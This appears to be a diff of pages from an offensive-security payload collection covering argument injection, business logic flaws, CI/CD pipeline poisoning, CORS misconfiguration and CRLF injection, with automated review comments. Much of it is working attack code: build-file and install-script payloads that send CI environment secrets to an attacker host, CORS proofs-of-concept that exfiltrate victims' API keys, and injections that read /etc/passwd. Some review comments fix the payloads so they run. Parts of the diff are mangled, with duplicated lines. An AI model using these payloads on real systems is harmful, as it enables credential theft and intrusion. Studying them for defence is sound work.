--use-compres-program=<program>
```
There are also short options to work without spaces:
```ps1
-T<file>
-I"/path/to/exec"
```
### FIND
Find some_file inside /tmp directory.
```php
$file = "some_file";
system("find /tmp -iname ".escapeshellcmd($file));
```
Print /etc/passwd content.
```php
$file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
```
### WGET
Example of vulnerable code
```php
system(escapeshellcmd('wget '.$url));
```
Arbitrary file write
```php
$url = '--directory-prefix=/var/www/html http://example.com/example.php';
```
## References
- [staaldraad - Etienne Stalmans, November 24, 2019](https://staaldraad.github.io/post/2019-11-24-argument-injection/)
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014](https://www.exploit-db.com/papers/33930)
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md)
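Review bot: `--use-compres-program=<program>` in the tar create-command list is misspelled; the tar option is `--use-compress-program`, so the line as written is not a working option string. Also `'''extract'''` and `'''create'''` use triple single quotes rather than backticks, so they render literally, and the Summary anchors `#CURL`, `#TAR`, `#FIND`, `#WGET` are uppercase while generated heading anchors are lowercase (`#curl`, `#tar`, ...), so those links will not resolve. Minor wording: `passed to to a command`, `splited`.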


@@ -1,22 +0,0 @@
# Book's list
Grab a book and relax, these ones are the best security books (in my opinion).
- [Web Hacking 101](https://leanpub.com/web-hacking-101)
- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
- [The Mobile Application Hackers Handbook](http://amzn.to/2cVOIrE)
- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)


@@ -0,0 +1,71 @@
# Business Logic Errors
> Business logic errors, also known as business logic flaws, are a type of application vulnerability that stems from the application's business logic, which is the part of the program that deals with real-world business rules and processes. These rules could include things like pricing models, transaction limits, or the sequences of operations that need to be followed in a multi-step process.
## Summary
* [Examples](#examples)
* [References](#references)
## Examples
Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences.
Common examples of Business Logic Errors.
* Review Feature Testing
* Assess if you can post a product review as a verified reviewer without having purchased the item.
* Attempt to provide a rating outside of the standard scale, for instance, a 0, 6 or negative number in a 1 to 5 scale system.
* Test if the same user can post multiple ratings for a single product. This is useful in detecting potential race conditions.
* Determine if the file upload field permits all extensions; developers often overlook protections on these endpoints.
* Investigate the possibility of posting reviews impersonating other users.
* Attempt Cross-Site Request Forgery (CSRF) on this feature, as it's frequently unprotected by tokens.
* Discount Code Feature Testing
* Try to apply the same discount code multiple times to assess if it's reusable.
* If the discount code is unique, evaluate for race conditions by applying the same code for two accounts simultaneously.
* Test for Mass Assignment or HTTP Parameter Pollution to see if you can apply multiple discount codes when the application is designed to accept only one.
* Test for vulnerabilities from missing input sanitization such as XSS, SQL Injection on this feature.
* Attempt to apply discount codes to non-discounted items by manipulating the server-side request.
* Delivery Fee Manipulation
* Experiment with negative values for delivery charges to see if it reduces the final amount.
* Evaluate if free delivery can be activated by modifying parameters.
* Currency Arbitrage
* Attempt to pay in one currency, for example, USD, and request a refund in another, like EUR. The difference in conversion rates could result in a profit.
* Premium Feature Exploitation
* Explore the possibility of accessing premium account-only sections or endpoints without a valid subscription.
* Purchase a premium feature, cancel it, and see if you can still use it after a refund.
* Look for true/false values in requests/responses that validate premium access. Use tools like Burp's Match & Replace to alter these values for unauthorized premium access.
* Review cookies or local storage for variables validating premium access.
* Refund Feature Exploitation
* Purchase a product, ask for a refund, and see if the product remains accessible.
* Look for opportunities for currency arbitrage.
* Submit multiple cancellation requests for a subscription to check the possibility of multiple refunds.
* Cart/Wishlist Exploitation
* Test the system by adding products in negative quantities, along with other products, to balance the total.
* Try to add more of a product than is available.
* Check if a product in your wishlist or cart can be moved to another user's cart or removed from it.
* Thread Comment Testing
* Check if there's a limit to the number of comments on a thread.
* If a user can only comment once, use race conditions to see if multiple comments can be posted.
* If the system allows comments by verified or privileged users, try to mimic these parameters and see if you can comment as well.
* Attempt to post comments impersonating other users.
* Parameter Tampering
* Manipulate payment or other critical fields to alter their values.
* By exploiting HTTP Parameter Pollution & Mass Assignment, add extra or unexpected fields.
* Try to manipulate the response to bypass restrictions, such as 2FA.
## References
* [Business logic vulnerability - OWASP](https://owasp.org/www-community/vulnerabilities/Business_logic_vulnerability)
* [Business logic vulnerabilities - PortSwigger](https://portswigger.net/web-security/logic-flaws)
* [Examples of business logic vulnerabilities - PortSwigger](https://portswigger.net/web-security/logic-flaws/examples)
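Review bot: under "Review Feature Testing" the bullet "Test if the same user can post multiple ratings for a single product. This is useful in detecting potential race conditions" conflates two different checks: resubmitting the rating request sequentially only tests whether the one-rating-per-user rule is enforced at all, while a race condition shows up only when the two requests are sent concurrently (the discount-code and thread-comment bullets further down already say "simultaneously"). Suggest: "Resubmit the rating request; if it is rejected, send two copies concurrently to test for a race." Also, the discount-code bullet "Test for vulnerabilities from missing input sanitization such as XSS, SQL Injection" contradicts the section's own opening sentence that business logic errors "do not rely on problems in the code itself (like unfiltered user input)"; either drop it or label it as an adjacent input-validation check rather than a logic flaw.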

CICD/README.md Normal file

@@ -0,0 +1,328 @@
# CI/CD attacks
> CI/CD pipelines are often triggered by untrusted actions such a forked pull requests and new issue submissions for public git repositories.\
> These systems often contain sensitive secrets or run in privileged environments.\
> Attackers may gain an RCE into such systems by submitting crafted payloads that trigger the pipelines.\
> Such vulnerabilities are also known as Poisoned Pipeline Execution (PPE)
## Summary
- [CI/CD attacks](#cicd-attacks)
- [Summary](#summary)
- [Tools](#tools)
- [Package managers & Build Files](#package-managers--build-files)
- [Javascript / Typescript - package.json](#javascript--typescript---packagejson)
- [Python - setup.py](#python---setuppy)
- [Bash / sh - *.sh](#bash--sh---sh)
- [Maven / Gradle](#maven--gradle)
- [BUILD.bazel](#buildbazel)
- [Makefile](#makefile)
- [Rakefile](#rakefile)
- [C# - *.csproj](#c---csproj)
- [CI/CD products](#cicd-products)
- [GitHub Actions](#github-actions)
- [Azure Pipelines (Azure DevOps)](#azure-pipelines-azure-devops)
- [CircleCI](#circleci)
- [Drone CI](#drone-ci)
- [BuildKite](#buildkite)
- [References](#references)
## Tools
* [praetorian-inc/gato](https://github.com/praetorian-inc/gato) - GitHub Self-Hosted Runner Enumeration and Attack Tool
## Package managers & Build Files
> Code injections into build files are CI agnostic and therefore they make great targets when you don't know what system builds the repository, or if there are multiple CI's in the process.\
> In the examples below you need to either replace the files with the sample payloads, or inject your own payloads into existing files by editing just a part of them.\n
> If the CI builds forked pull requests then your payload may run in the CI.
### Javascript / Typescript - package.json
> The `package.json` file is used by many Javascript / Typescript package managers (`yarn`,`npm`,`pnpm`,`npx`....).
> The file may contain a `scripts` object with custom commands to run.\
`preinstall`, `install`, `build` & `test` are often executed by default in most CI/CD pipelines - hence they are good targets for injection.\
> If you come across a `package.json` file - edit the `scripts` object and inject your instruction there
NOTE: the payloads in the instructions above must be `json escaped`.
Example:
```json
{
"name": "my_package",
"description": "",
"version": "1.0.0",
"scripts": {
"preinstall": "set | curl -X POST --data-binary @- {YourHostName}",
"install": "set | curl -X POST --data-binary @- {YourHostName}",
"build": "set | curl -X POST --data-binary @- {YourHostName}",
"test": "set | curl -X POST --data-binary @- {YourHostName}"
},
"repository": {
"type": "git",
"url": "https://github.com/foobar/my_package.git"
},
"keywords": [],
"author": "C.Norris"
}
```
### Python - setup.py
> `setup.py` is used by python's package managers during the build process.
It is often executed by default.\
> Replacing the setup.py files with the following payload may trigger their execution by the CI.
```python
import os
os.system('set | curl -X POST --data-binary @- {YourHostName}')
```
### Bash / sh - *.sh
> Shell scripts in the repository are often executed in custom CI/CD pipelines.\
> Replacing all the `.sh` files in the repo and submitting a pull request may trigger their execution by the CI.
```shell
set | curl -X POST --data-binary @- {YourHostName}
```
### Maven / Gradle
> These package managers come with "wrappers" that help with running custom commands for building / testing the project.\
These wrappers are essentially executable shell/cmd scripts.
Replace them with your payloads to have them executed:
- `gradlew`
- `mvnw`
- `gradlew.bat` (windows)
- `mvnw.cmd` (windows)
> Occasionally the wrappers will not be present in the repository.\
> In such cases you can edit the `pom.xml` file, which instructs maven what dependencies to fetch and which `plugins` to run.\
> Some plugins allow code execution, here's an example of the common plugin `org.codehaus.mojo`.\
> If the `pom.xml` file you're targeting already contains a `<plugins>` instruction then simply add another `<plugin>` node under it.\
> If if **doesn't** contain a `<plugins>` node then add it under the `<build>` node.
NOTE: remember that your payload is inserted in an XML document - XML special characters must be escaped.
```xml
<build>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>1.6.0</version>
<executions>
<execution>
<id>run-script</id>
<phase>validate</phase>
<goals>
<goal>exec</goal>
</goals>
</execution>
</executions>
<configuration>
<executable>bash</executable>
<arguments>
<argument>
-c
</argument>
<argument>{XML-Escaped-Payload}</ argument>
</arguments>
</configuration>
</plugin>
</plugins>
</build>
```
### BUILD.bazel
> Replace the content of `BUILD.bazel` with the following payload
NOTE: `BUILD.bazel` requires escaping backslashes.\
Replace any `\` with `\\` inside your payload.
```shell
genrule(
name = "build",
outs = ["foo"],
cmd = "{Escaped-Shell-Payload}",
visibility = ["//visibility:public"],
)
```
### Makefile
> Make files are often executed by build pipelines for projects written in `C`, `C++` or `Go` (but not exclusively).\
> There are several utilities that execute `Makefile`, the most common are `GNU Make` & `Make`.\
> Replace your target `Makefile` with the following payload
```shell
.MAIN: build
.DEFAULT_GOAL := build
.PHONY: all
all:
set | curl -X POST --data-binary @- {YourHostName}
build:
set | curl -X POST --data-binary @- {YourHostName}
compile:
set | curl -X POST --data-binary @- {YourHostName}
default:
set | curl -X POST --data-binary @- {YourHostName}
```
### Rakefile
> Rake files are similar to `Makefile` but for Ruby projects.\
> Replace your target `Rakefile` with the following payload
```shell
task :pre_task do
sh "{Payload}"
end
task :build do
sh "{Payload}"
end
task :test do
sh "{Payload}"
end
task :install do
sh "{Payload}"
end
task :default => [:build]
```
### C# - *.csproj
> `.csproj` files are build file for the `C#` runtime.\
> They are constructed as XML files that contain the different dependencies that are required to build the project.\
> Replacing all the `.csproj` files in the repo with the following payload may trigger their execution by the CI.
NOTE: Since this is an XML file - XML special characters must be escaped.
```powershell
<Project>
<Target Name="SendEnvVariables" BeforeTargets="Build;BeforeBuild;BeforeCompile">
<Exec Command="powershell -Command &quot;$envBody = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes((Get-ChildItem env: | Format-List | Out-String))); Invoke-WebRequest -Uri {YourHostName} -Method POST -Body $envBody&quot;" />
</Target>
</Project>
```
## CI/CD products
### GitHub Actions
The configuration files for GH actions are located in the directory `.github/workflows/`\
You can tell if the action builds pull requests based on its trigger (`on`) instructions:
```yaml
on:
push:
branches:
- master
pull_request:
```
In order to run an OS command in an action that builds pull requests - simply add a `run` instruction to it.\
An action may also be vulnerable to command injection if it dynamically evaluates untrusted input as part of its `run` instruction:
```yaml
jobs:
print_issue_title:
runs-on: ubuntu-latest
name: Print issue title
steps:
- run: echo "${{github.event.issue.title}}"
```
### Azure Pipelines (Azure DevOps)
The configuration files for azure pipelines are normally located in the root directory of the repository and called - `azure-pipelines.yml`\
You can tell if the pipeline builds pull requests based on its trigger instructions. Look for `pr:` instruction:
```yaml
trigger:
branches:
include:
- master
- refs/tags/*
pr:
- master
```
### CircleCI
The configuration files for CircleCI builds are located in `.circleci/config.yml`\
By default - CircleCI pipelines don't build forked pull requests. It's an opt-in feature that should be enabled by the pipeline owners.
In order to run an OS command in a workflow that builds pull requests - simply add a `run` instruction to the step.
```yaml
jobs:
build:
docker:
- image: cimg/base:2022.05
steps:
- run: echo "Say hello to YAML!"
```
### Drone CI
The configuration files for Drone builds are located in `.drone.yml`\
Drone build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.
In order to run an OS command in a workflow that builds pull requests - simply add a `commands` instruction to the step.
```yaml
steps:
- name: do-something
image: some-image:3.9
commands:
- {Payload}
```
### BuildKite
The configuration files for BuildKite builds are located in `.buildkite/*.yml`\
BuildKite build are often self-hosted, this means that you may gain excessive privileges to the kubernetes cluster that runs the runners, or to the hosting cloud environment.
In order to run an OS command in a workflow that builds pull requests - simply add a `command` instruction to the step.
```yaml
steps:
- label: "Example Test"
command: echo "Hello!"
```
## References
* [Poisoned Pipeline Execution](https://www.cidersecurity.io/top-10-cicd-security-risks/poisoned-pipeline-execution-ppe/)
* [DEF CON 25 - spaceB0x - Exploiting Continuous Integration (CI) and Automated Build systems](https://youtu.be/mpUDqo7tIk8)
* [Azure-Devops-Command-Injection](https://pulsesecurity.co.nz/advisories/Azure-Devops-Command-Injection)
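Review bot: the exec-maven-plugin example under "Maven / Gradle" contains `</ argument>` (space after the slash), which is not well-formed XML; Maven aborts with a POM parse error before it resolves any plugin, so the `validate`-phase execution never runs. It must be `</argument>`. Two smaller points in the same file: the "Package managers & Build Files" intro ends with a literal `\n` after "editing just a part of them." where the neighbouring lines use a trailing backslash for a hard break, and the `.csproj` block is fenced as `powershell` although its content is XML (only highlighting is affected, but `xml` would match the Maven block above it).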

CONTRIBUTING.md Normal file

@@ -0,0 +1,63 @@
# CONTRIBUTING
PayloadsAllTheThings' Team :heart: pull requests :)
Feel free to improve with your payloads and techniques !
You can also contribute with a :beers: IRL, or using the sponsor button.
## Pull Requests Guidelines
In order to provide the safest payloads for the community, the following rules must be followed for **every** Pull Request.
- Payloads must be sanitized
- Use `id`, and `whoami`, for RCE Proof of Concepts
- Use `[REDACTED]` when the user has to replace a domain for a callback. E.g: XSSHunter, BurpCollaborator etc.
- Use `10.10.10.10` and `10.10.10.11` when the payload require IP addresses
- Use `Administrator` for privileged users and `User` for normal account
- Use `P@ssw0rd`, `Password123`, `password` as default passwords for your examples
- Prefer commonly used name for machines such as `DC01`, `EXCHANGE01`, `WORKSTATION01`, etc
- References must have an `author`, a `title` and a `link`. The `date` is not mandatory but appreciated :)
## Techniques Folder
Every section should contains the following files, you can use the `_template_vuln` folder to create a new technique folder:
- README.md - vulnerability description and how to exploit it, including several payloads, more below
- Intruder - a set of files to give to Burp Intruder
- Images - pictures for the README.md
- Files - some files referenced in the README.md
## README.md format
Use the following example to create a new technique `README.md` file.
```markdown
# Vulnerability Title
> Vulnerability description
## Summary
* [Tools](#tools)
* [Something](#something)
* [Subentry 1](#sub1)
* [Subentry 2](#sub2)
* [References](#references)
## Tools
- [Tool 1](https://example.com)
- [Tool 2](https://example.com)
## Something
Quick explanation
### Subentry 1
Something about the subentry 1
## References
- [Blog title - Author, Date](https://example.com)
```
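Review bot: in the README.md template the Summary links `[Subentry 1](#sub1)` and `[Subentry 2](#sub2)` do not resolve: GitHub derives anchors from the heading text, so `### Subentry 1` becomes `#subentry-1`, and a contributor who copies the template verbatim ships a broken table of contents (the CSRF hunk further down this page is fixing exactly this kind of anchor). Use `#subentry-1` and `#subentry-2`. Grammar: "Every section should contains" should read "should contain", and "when the payload require IP addresses" should read "requires".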


@@ -0,0 +1,272 @@
# CORS Misconfiguration
> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials.
## Summary
* [Tools](#tools)
* [Prerequisites](#prerequisites)
* [Exploitation](#exploitation)
* [References](#references)
## Tools
* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
* [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner)
* [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html)
* [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors)
## Prerequisites
* BURP HEADER> `Origin: https://evil.com`
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
## Exploitation
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
### Vulnerable Example: Origin Reflection
#### Vulnerable Implementation
```powershell
GET /endpoint HTTP/1.1
Host: victim.example.com
Origin: https://evil.com
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
{"[private API key]"}
```
#### Proof of concept
This PoC requires that the respective JS script is hosted at `evil.com`
```js
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};
```
or
```html
<html>
<body>
<h2>CORS PoC</h2>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhr.open("GET",
"https://victim.example.com/endpoint", true);
xhr.withCredentials = true;
xhr.send();
}
</script>
</body>
</html>
```
### Vulnerable Example: Null Origin
#### Vulnerable Implementation
It's possible that the server does not reflect the complete `Origin` header but
that the `null` origin is allowed. This would look like this in the server's
response:
```
GET /endpoint HTTP/1.1
Host: victim.example.com
Origin: null
Cookie: sessionid=...
HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
{"[private API key]"}
```
#### Proof of concept
This can be exploited by putting the attack code into an iframe using the data
URI scheme. If the data URI scheme is used, the browser will use the `null`
origin in the request:
```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
```
### Vulnerable Example: XSS on Trusted Origin
If the application does implement a strict whitelist of allowed origins, the
exploit codes from above do not work. But if you have an XSS on a trusted
origin, you can inject the exploit coded from above in order to exploit CORS
again.
```
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
```
### Vulnerable Example: Wildcard Origin `*` without Credentials
If the server responds with a wildcard origin `*`, **the browser does never send
the cookies**. However, if the server does not require authentication, it's still
possible to access the data on the server. This can happen on internal servers
that are not accessible from the Internet. The attacker's website can then
pivot into the internal network and access the server's data without authentication.
```powershell
* is the only wildcard origin
https://*.example.com is not valid
```
#### Vulnerable Implementation
```powershell
GET /endpoint HTTP/1.1
Host: api.internal.example.com
Origin: https://evil.com
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
{"[private API key]"}
```
#### Proof of concept
```js
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://api.internal.example.com/endpoint',true);
req.send();
function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};
```
### Vulnerable Example: Expanding the Origin / Regex Issues
Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
#### Vulnerable Implementation (Example 1)
In this scenario any prefix inserted in front of `example.com` will be accepted by the server.
```
GET /endpoint HTTP/1.1
Host: api.example.com
Origin: https://evilexample.com
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evilexample.com
Access-Control-Allow-Credentials: true
{"[private API key]"}
```
#### Proof of concept (Example 1)
This PoC requires the respective JS script to be hosted at `evilexample.com`
```js
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://api.example.com/endpoint',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};
```
#### Vulnerable Implementation (Example 2)
In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain.
```
GET /endpoint HTTP/1.1
Host: api.example.com
Origin: https://apiiexample.com
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://apiiexample.com
Access-Control-Allow-Credentials: true
{"[private API key]"}
```
#### Proof of concept (Example 2)
This PoC requires the respective JS script to be hosted at `apiiexample.com`
```js
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://api.example.com/endpoint',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};
```
## Labs
* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
## Bug Bounty reports
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
## References
* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)
* [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors)
* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
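Review bot: the Prerequisites list spells the response header `Access-Control-Allow-Credential: true`; the real header is `Access-Control-Allow-Credentials` (plural), as the example responses below it correctly show, and a tester who matches on the prerequisite string as written will miss it. In addition, four of the PoCs exfiltrate to `//atttacker.net` (three t's) and append `this.responseText` unencoded, while the null-origin PoC uses `attacker.example.net` with `encodeURIComponent(...)`; the null-origin version is the correct one (an unencoded `&` or `#` in the response truncates the exfiltrated body) and, per CONTRIBUTING on this same page, the callback host should be `[REDACTED]`. Minor: the Summary omits the "Labs" and "Bug Bounty reports" sections, and the origin-reflection and wildcard request/response blocks are fenced as `powershell` rather than `http` like the other examples.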

View File

@@ -1,20 +1,29 @@
# CRLF # Carriage Return Line Feed
The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in todays popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. > The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in todays popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. > A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
## Summary
- [CRLF - Add a cookie](#crlf---add-a-cookie)
- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
- [CRLF - Write HTML](#crlf---write-html)
- [CRLF - Filter Bypass](#crlf---filter-bypass)
- [Labs](#labs)
- [References](#references)
## CRLF - Add a cookie ## CRLF - Add a cookie
Requested page Requested page
```powershell ```http
http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue
``` ```
HTTP Response HTTP Response
```powershell ```http
Connection: keep-alive Connection: keep-alive
Content-Length: 178 Content-Length: 178
Content-Type: text/html Content-Type: text/html
@@ -37,7 +46,7 @@ http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
HTTP Response HTTP Response
```powershell ```http
HTTP/1.1 200 OK HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8 Content-Type: text/html; charset=utf-8
@@ -62,13 +71,13 @@ X-XSS-Protection:0
```http ```http
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
``` ```
```powershell
HTTP response HTTP response
```http ```http
Set-Cookie:en Set-Cookie:en
Content-Length: 0 Content-Length: 0
```powershell
HTTP/1.1 200 OK HTTP/1.1 200 OK
Content-Type: text/html Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
@@ -84,7 +93,7 @@ Content-Length: 34
%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
``` ```
```powershell Remainder:
* %E5%98%8A = %0A = \u560a * %E5%98%8A = %0A = \u560a
* %E5%98%8D = %0D = \u560d * %E5%98%8D = %0D = \u560d
@@ -95,6 +104,12 @@ Remainder:
## Labs ## Labs
* [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection) * [https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
## References
* https://www.owasp.org/index.php/CRLF_Injection
* https://vulners.com/hackerone/H1:192749
## References ## References
* https://www.owasp.org/index.php/CRLF_Injection * https://www.owasp.org/index.php/CRLF_Injection
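Review bot: the last hunk (`@@ -95,6 +104,12 @@`) shows a `## References` heading with the OWASP and vulners links among the changed lines and then a second `## References` heading with the OWASP link in the unchanged context; please confirm the new file does not end with the References section twice, and that the `H1:192749` vulners link survives under the single remaining heading. The `powershell` to `http` fence changes and the removal of the leftover `powershell` fence lines in the earlier hunks look right. "Remainder:" before the `%E5%98%8A = %0A` list reads as a typo for "Reminder:" and is worth fixing while the file is being touched.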

Binary file not shown (image, 393 KiB before, 407 KiB after).


@@ -5,20 +5,31 @@
## Summary ## Summary
* [Tools](#tools)
* [Methodology](#methodology) * [Methodology](#methodology)
